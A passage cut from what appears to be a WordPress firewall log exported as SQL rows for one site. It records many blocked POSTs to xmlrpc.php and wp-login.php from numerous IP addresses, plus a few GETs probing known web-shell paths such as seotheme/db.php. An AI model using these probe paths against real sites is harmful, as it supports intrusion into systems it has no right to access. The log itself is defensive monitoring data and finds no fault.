Firefox\\/84.0\"}','udPbxOk3UKcsMzmtTlpLajXI',0,1664424596.2257,563,'','POST',403,0,515,0,1,'',0),('5.101.156.133',90545285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y6JCsyvK4RxVieP8gh0j3QmD',0,1664424727.6004,18179,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-content/themes/hestia/inc/core/class-core-hestia.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','ASeb3fqGWoi8PdJLHaVFtTQs',0,1664424755.8136,351,'','POST',403,0,700,0,1,'',0),('87.236.20.246',1475089654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FSKPINx6XM31nma8dcrUgAzi',0,1664424826.9259,1590,'','POST',403,0,515,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','EdcRItgKseXbZyLo9qH0kB4f',0,1664424976.6830,1320,'','POST',403,0,600,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','W9wTOCRhc8S6gmotLa37uUfX',0,1664425172.5137,3263,'','POST',403,0,515,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ngJrwe7hom4AaRWSX6cOCfIM',0,1664425443.2933,18865,'','POST',403,0,515,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RQNWsnIw306qFKyBSf87pEb2',0,1664425547.0656,1385,'','POST',403,0,515,0,1,'',0),('47.241.3.166',804324262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','aqghNm8xSWVFIwJlyO5Y7kCc',0,1664425679.9531,14937,'','POST',403,0,515,0,1,'',0),('194.163.144.53',3265499189,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','uzaimD5ebOGQgKTtXUdFNqnk',0,1664425677.4123,17504,'','POST',403,0,515,0,1,'',0),('124.221.205.249',2094910969,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','tx1ze3sYhoEdpZ7U5MFA2DiL',0,1664425701.5261,502,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','emKGOBkNl6inrsh2VfSZxIup',0,1664425703.6015,517,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','xpM6XWrjP7vwmz1U8T3b2yHB',0,1664425705.9435,559,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','wDXsq2OoAY3uHF94feWIcxjR',0,1664425707.7918,604,'','POST',403,0,515,0,1,'',0),('162.0.210.238',2717962990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','fk1w8tnUvoJNKmYbxM2ZcR65',0,1664425717.4283,603,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','UCPqkaphxKjJSbI015myOoWw',0,1664425723.0984,920,'','POST',403,0,515,0,1,'',0),('103.200.23.120',1741166456,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','UWauDJCjZ862mz4b9Sw1e7Rp',0,1664425723.7143,719,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bUEt81nqGPB6u4gw3AiCvcfx',0,1664425884.9598,496,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ExL52BFGUboVtYQ1daJ0KnTX',0,1664426150.8950,9112,'','POST',403,0,515,0,1,'',0),('31.187.74.213',532368085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pvIQV7MHbLX63l0GPo4BEfAD',0,1664426230.0813,19601,'','POST',403,0,515,0,1,'',0),('128.199.21.138',2160530826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','608hfNskzXneLQjYVyJcB4gC',0,1664426478.9094,1651,'','POST',403,0,515,0,1,'',0),('50.87.216.226',844617954,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4873AkUb1Jcvts9Kg5IQ6MWr',0,1664426547.6442,1357,'','POST',403,0,515,0,1,'',0),('20.109.101.102',342713702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jEobTeQ9IZy1FzUSksR0iu3B',0,1664426799.5864,18778,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','htvEjF5kPK4DlmAYMu12ZXp7',0,1664427073.7495,495,'','POST',403,0,600,0,1,'',0),('64.227.160.56',1088659512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4hTitpZg2NjXqERWQ15kCVAz',0,1664427106.8450,6674,'','POST',403,0,515,0,1,'',0),('139.99.69.189',2338538941,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F8PTOYoKr5nR4U2kjuc3yGhZ',0,1664427177.7018,1526,'','POST',403,0,515,0,1,'',0),('207.148.118.130',3482613378,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y8DMxVibIjSuQtBOWXGCa2Az',0,1664427386.0544,19576,'','POST',403,0,515,0,1,'',0),('54.36.82.134',908350086,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','szTtb5BGlYJ7m62P9n3ugHXF',0,1664427473.8695,9056,'','POST',403,0,515,0,1,'',0),('5.101.157.241',90545649,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nfOIV6cSMhBj4PW8mZtlGz90',0,1664428624.1102,19389,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hxA3GfU16pmbKseOEQ7l2aIq',0,1664428687.2782,1566,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','elsWnRBPdUjOmrNiI0wz6QEC',0,1664428937.0445,19064,'','POST',403,0,515,0,1,'',0),('66.45.251.157',1110309789,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wa5qJlOx47otIu1PEz68CVsr',0,1664429001.8979,1864,'','POST',403,0,515,0,1,'',0),('82.165.86.39',1386567207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Gg73dFKowEuhNp2rJcfCl9vU',0,1664429131.6074,18952,'','POST',403,0,515,0,1,'',0),('20.239.161.138',351248778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','nBkJrLPs3Z2paIWzKDx6UAHb',0,1664429136.2772,14293,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','zOn1WBoaLE69gfYUjNAvP53R',0,1664429155.8636,751,'','POST',403,0,515,0,1,'',0),('185.107.112.126',3110826110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','efl2FbVkpZXm4rtdW7ASDu1K',0,1664429157.6084,562,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','UtiHcq1OBh0su8PbfSGN5rWX',0,1664429166.7591,3260,'','POST',403,0,515,0,1,'',0),('133.18.25.1',2232555777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','dEs6fbgUkFT7jwaR25XhBISt',0,1664429175.6178,536,'','POST',403,0,515,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','ZPTQzacmlMKE3e79oA0sgnRw',0,1664429177.8340,569,'','POST',403,0,515,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WYTscxr02MOkv5UpSEyuA8ZI',0,1664429533.4203,18649,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2CmwRMkzNioJEYPXcG4xVtgy',0,1664429623.5519,18720,'','POST',403,0,515,0,1,'',0),('92.222.68.53',1558070325,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vlKB6rcsQGg7Tq9WAVnfDFuP',0,1664429855.8586,18570,'','POST',403,0,515,0,1,'',0),('93.113.111.100',1567715172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wiKfvp6Z1rDLAF5dWeksCjER',0,1664430292.3101,21215,'','POST',403,0,515,0,1,'',0),('62.102.148.156',1046910108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GzWa4weDcKhSJ2CRxAqXvo3j',0,1664430503.5795,11305,'','POST',403,0,515,0,1,'',0),('104.161.80.219',1755402459,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HtxwkiMfjCI4WyaV7lbZOXJm',0,1664430946.3773,12403,'','POST',403,0,515,0,1,'',0),('46.182.4.117',783680629,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','INSqAyzPsHTice4dFknu2wpW',0,1664431234.8153,16914,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5gjc2PDVtmC3EM9fwqvdslRH',0,1664431335.5106,18637,'','POST',403,0,515,0,1,'',0),('133.18.25.1',2232555777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','RiucyxkSGTVMKIfYQv6XCtw3',0,1664431354.6292,672,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Mg3ulove7wadjRYBftpriVWU',0,1664431357.5213,738,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','Q5egyZ8lKAaGYVjsbIzw60To',0,1664431365.7701,1422,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','BhpgOQSTMsy5YJ6nt2eciEAk',0,1664431369.9227,676,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','vxBROyztlw5WSNYHkDAaLpnb',0,1664431380.1371,1679,'','POST',403,0,515,0,1,'',0),('128.127.106.229',2155834085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','4bdvDil0Te1mrnZPLAowJN5X',0,1664431387.3713,942,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','DJscPnuebH5RVBSzTq3aIOWC',0,1664431388.1351,732,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','HKtMRDgv2O3sGk9xX61lnzbL',0,1664431395.9468,558,'','POST',403,0,515,0,1,'',0),('194.233.73.177',3270068657,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','RafDqyuoHZdNMe5C2LFYtkQ4',0,1664431404.8149,634,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','YWjFz3ln1JagyCcstHeZ8kMS',0,1664431406.6237,597,'','POST',403,0,515,0,1,'',0),('209.87.239.76',3512201036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PRoEfSQcBb1pt6uYAheOmVDk',0,1664431580.5596,19291,'','POST',403,0,515,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xla5ArLvHKRYkghuCm6Qn1pw',0,1664431678.1766,18517,'','POST',403,0,515,0,1,'',0),('140.143.188.163',2358230179,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VSGZ9fdD1FKrWeMC6ymcplou',0,1664431939.4648,18694,'','POST',403,0,515,0,1,'',0),('103.153.68.244',1738097908,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qQu9cdMaf7PzkleEvD4xCTJA',0,1664432041.9782,1616,'','POST',403,0,515,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fa7qExGheWwYTsPnKfLyXrQ9',0,1664432305.2601,8304,'','POST',403,0,515,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xkgHRujqapCU9DnAZiOWYdyI',0,1664432415.2613,1782,'','POST',403,0,515,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','6hIOiz8eH7P2rBZulq5swotM',0,1664432894.0244,12309,'','POST',403,0,600,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','shjbDgZxRHitV8wXcdPYov96',0,1664433089.0410,18794,'','POST',403,0,515,0,1,'',0),('2.184.67.138',45630346,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DbX2PTNIYvOuF1s4ZCGMlqjn',0,1664433194.1747,1796,'','POST',403,0,515,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XbRlKINg9P4pWjCAOfr3hLJv',0,1664433451.1942,18854,'','POST',403,0,515,0,1,'',0),('45.63.13.50',759106866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','89GyNc6kYLKbph12U0TntAx7',0,1664433552.2270,1571,'','POST',403,0,515,0,1,'',0),('165.140.71.65',2777433921,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','z2SKsZgAUPO8RkvdEf3iMmuT',0,1664433708.6275,1673,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','fVEqs5OjnM2QTteRN7ZPlFm9',0,1664433717.1482,612,'','POST',403,0,515,0,1,'',0),('185.58.73.254',3107604990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','nPmK7Hyqt1JxeDrjcl4XLfsz',0,1664433721.4104,610,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','qw4b0P1JuGh5DkTFRazgvjXH',0,1664433726.1947,767,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','ezWUc9QE3i8jZYIodvAxkB4V',0,1664433745.5880,460,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','yXqJ1cER3MhYZ0nz7FDWeOA6',0,1664433747.6897,1551,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','raRzDnctx6G93T7IW2Ldi1jy',0,1664433747.7425,1560,'','POST',403,0,515,0,1,'',0),('195.178.120.231',3283253479,'','https://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FX3Aa5jp2gkUWHyVqO61wczY',0,1664433758.2200,8051,'','GET',403,0,700,0,1,'',0),('203.156.136.113',3416033393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','upQPf2g8NzhS3Cymql4GnTHc',0,1664433755.3993,17109,'','POST',403,0,515,0,1,'',0),('195.178.120.231',3283253479,'','https://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','QWnTiq6wu0zONgAhZtGjDPKv',0,1664433815.1528,356,'','GET',403,0,700,0,1,'',0),('195.178.120.231',3283253479,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','OyMxWmnAlcRpLuEfIJtSosUZ',0,1664433898.0615,484,'','GET',403,0,700,0,1,'',0),('195.178.120.231',3283253479,'','https://cteisys.com/wp-includes/pomo/umpomone.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ktZrOB9iwuU2XNLs6ldaEWSc',0,1664433952.9632,300,'','GET',403,0,700,0,1,'',0),('81.196.171.130',1371843458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j4QxmgD6IYnEFRVOt8kZKeoP',0,1664434262.0298,2785,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','68z34H1hMrDcRObJqBUNks5i',0,1664434652.8857,977,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','OaoM0zZpmTtxcPeHv16XbdWq',0,1664434696.3711,656,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','9rcuydUeEMTL3wj2GSso6Zpv',0,1664434697.9566,495,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','qcAHD2Nsebku5xCPRymBGZw1',0,1664434699.0066,501,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','mslizg4C5AvbyjLBMaqfuFO1',0,1664434701.9930,543,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','GbZ8nReQcXpqEKxiOyjzNsYL',0,1664434703.0772,512,'','POST',403,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','wdMf7YCzB5hyuUqPQ6Z43ixg',0,1664434704.1763,535,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','LKkfAEY9TSQ0cNewy2t3gPFa',0,1664434705.4431,534,'','POST',404,0,515,0,1,'',0),('118.195.133.73',1992525129,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 